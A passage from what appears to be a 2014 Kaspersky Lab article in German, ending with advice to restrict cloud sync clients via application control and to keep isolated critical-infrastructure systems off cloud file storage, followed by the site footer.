  • In besonderen Fällen muss die „Anwendungskontrolle“ benutzt werden, um die Verwendung von Cloud-Clients in Unternehmensnetzwerken einzuschränken, d.h. den Start von Synchronisierungsanwendungen von „Cloud“-Ordnern nur vertrauenswürdigen Mitarbeitern zu erlauben.

Und für die ganz und gar abgeschotteten Systeme, solchen etwa, die Elektrokraftwerke oder Wasserversorgungssysteme steuern oder den Start von Interkontinentalraketen ermöglichen – für Systeme dieser Art empfehlen wir eindringlich komplett von der Nutzung von Cloud-basierten Dateispeichern abzusehen.

Nach oben  |  Archiv >>

 

Copyright © 1996 - 2014
Kaspersky Lab
Industry Leading Antivirus Software
Alle Rechte vorbehalten
 

Email: webmaster@kaspersky.com
Datenschutzbestimmungen